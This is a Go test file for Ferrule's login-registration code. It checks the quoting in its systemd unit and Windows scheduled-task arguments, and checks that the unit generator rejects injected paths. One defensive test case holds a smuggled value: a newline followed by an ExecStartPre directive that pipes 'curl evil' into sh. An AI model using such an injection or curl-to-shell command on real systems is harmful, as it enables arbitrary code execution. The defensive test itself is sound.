package startup_test

import (
	"strings"
	"testing"

	"github.com/NakliTechie/ferrule/internal/startup"
)

// Ferrule is developed on a Mac and registers itself at login on three platforms. The two
// it cannot be run on here are exactly the two where a quoting mistake is invisible until
// somebody's machine does not come up — so the text and the arguments are generated by
// platform-free code, and this is where they are checked.
func TestLoginRegistrationsSurviveAwkwardPaths(t *testing.T) {
	// Every one of these is a path a real person has. A space is the common case; the
	// others are what a home directory can legally contain.
	paths := []string{
		"/usr/local/bin/ferrule",
		"/home/anaya/My Tools/ferrule",
		`/home/o'brien/bin/ferrule`,
		"/opt/ferrule & co/ferrule",
		`C:\Program Files\Ferrule\ferrule.exe`,
	}

	t.Run("the systemd unit keeps a path with a space in one piece", func(t *testing.T) {
		for _, p := range paths {
			unit := startup.SystemdUnit(p)
			line := ""
			for _, l := range strings.Split(unit, "\n") {
				if strings.HasPrefix(l, "ExecStart=") {
					line = strings.TrimPrefix(l, "ExecStart=")
				}
			}
			if line == "" {
				t.Fatalf("%s: the unit has no ExecStart", p)
			}
			if !strings.HasSuffix(line, " serve") {
				t.Errorf("%s: ExecStart does not end in the verb: %q", p, line)
			}
			cmd := strings.TrimSuffix(line, " serve")
			// systemd splits on whitespace, so a bare path with a space becomes two
			// arguments and the unit fails with a message about a missing binary.
			if strings.ContainsAny(p, " \t") && !strings.HasPrefix(cmd, `"`) {
				t.Errorf("%s: a path with a space was left unquoted: %q", p, cmd)
			}
			if !strings.Contains(cmd, "ferrule") {
				t.Errorf("%s: the binary is not in ExecStart: %q", p, cmd)
			}
		}
		// A clean exit must stay exited, or stopping Ferrule from a terminal cannot work.
		unit := startup.SystemdUnit("/usr/local/bin/ferrule")
		if !strings.Contains(unit, "Restart=on-failure") {
			t.Error("the unit does not restart on failure")
		}
		if strings.Contains(unit, "Restart=always") {
			t.Error("Restart=always makes Ferrule impossible to stop by hand")
		}
		if !strings.Contains(unit, "WantedBy=default.target") {
			t.Error("the unit is not wanted by anything, so enabling it does nothing")
		}
	})

	t.Run("the scheduled task carries its own quotes", func(t *testing.T) {
		for _, p := range paths {
			args := startup.SchtasksCreateArgs(p)
			tr := valueAfter(t, args, "/TR")
			// /TR takes one whole command line, so the executable inside it needs quotes
			// of its own whatever the path looks like.
			if !strings.HasPrefix(tr, `"`+p+`"`) {
				t.Errorf("%s: /TR does not quote the executable: %q", p, tr)
			}
			if !strings.HasSuffix(tr, " serve") {
				t.Errorf("%s: /TR does not run the verb: %q", p, tr)
			}
			if valueAfter(t, args, "/SC") != "ONLOGON" {
				t.Errorf("%s: the task does not run at logon", p)
			}
			if valueAfter(t, args, "/RL") != "LIMITED" {
				t.Errorf("%s: the task asks for more privilege than a user daemon needs", p)
			}
			if !has(args, "/F") {
				t.Errorf("%s: re-registering would fail on the existing task", p)
			}
			if valueAfter(t, args, "/TN") != startup.TaskName {
				t.Errorf("%s: the task name does not match the one queried and deleted", p)
			}
		}
	})

	t.Run("what is created is what is queried and deleted", func(t *testing.T) {
		// Three commands naming the job three different ways is a registration that can
		// be made and never removed.
		create := valueAfter(t, startup.SchtasksCreateArgs("/x/ferrule"), "/TN")
		if q := valueAfter(t, startup.SchtasksQueryArgs(), "/TN"); q != create {
			t.Errorf("query names %q, create names %q", q, create)
		}
		if d := valueAfter(t, startup.SchtasksDeleteArgs(), "/TN"); d != create {
			t.Errorf("delete names %q, create names %q", d, create)
		}
		if !has(startup.SchtasksDeleteArgs(), "/F") {
			t.Error("delete would stop to ask, with nobody there to answer")
		}
	})
}

func valueAfter(t *testing.T, args []string, flag string) string {
	t.Helper()
	for i, a := range args {
		if a == flag && i+1 < len(args) {
			return args[i+1]
		}
	}
	t.Fatalf("%s is not in %v", flag, args)
	return ""
}

func has(args []string, flag string) bool {
	for _, a := range args {
		if a == flag {
			return true
		}
	}
	return false
}

// A unit file is written by Ferrule and read by systemd, which does more to the text than
// split it on spaces. Quoting handles one of three hazards.
func TestAUnitFileCannotBeInjectedThroughTheBinaryPath(t *testing.T) {
	t.Run("percent is a specifier, not a character", func(t *testing.T) {
		// systemd expands %h to the home directory, %n to the unit name, and so on. A
		// path containing one would be rewritten on the way to exec, and quoting does
		// nothing about it — the escape for a literal percent is a doubled percent.
		unit := startup.SystemdUnit("/home/a%hb/ferrule")
		if strings.Contains(unit, "%h") && !strings.Contains(unit, "%%h") {
			t.Errorf("a %% specifier survives into ExecStart: %q", execStart(t, unit))
		}
	})

	t.Run("a line break is refused, not escaped", func(t *testing.T) {
		// There is no escape for it: a newline ends the directive, so anything after it
		// is read as further unit directives in a file Ferrule wrote.
		unit := startup.SystemdUnit("/tmp/x\nExecStartPre=/bin/sh -c 'curl evil|sh'\n#")
		if unit != "" {
			t.Errorf("a path with a line break produced a unit:\n%s", unit)
		}
	})

	t.Run("an ordinary path still works", func(t *testing.T) {
		if got := execStart(t, startup.SystemdUnit("/usr/local/bin/ferrule")); got != "/usr/local/bin/ferrule serve" {
			t.Errorf("ExecStart = %q", got)
		}
	})
}

func execStart(t *testing.T, unit string) string {
	t.Helper()
	for _, l := range strings.Split(unit, "\n") {
		if strings.HasPrefix(l, "ExecStart=") {
			return strings.TrimPrefix(l, "ExecStart=")
		}
	}
	return ""
}
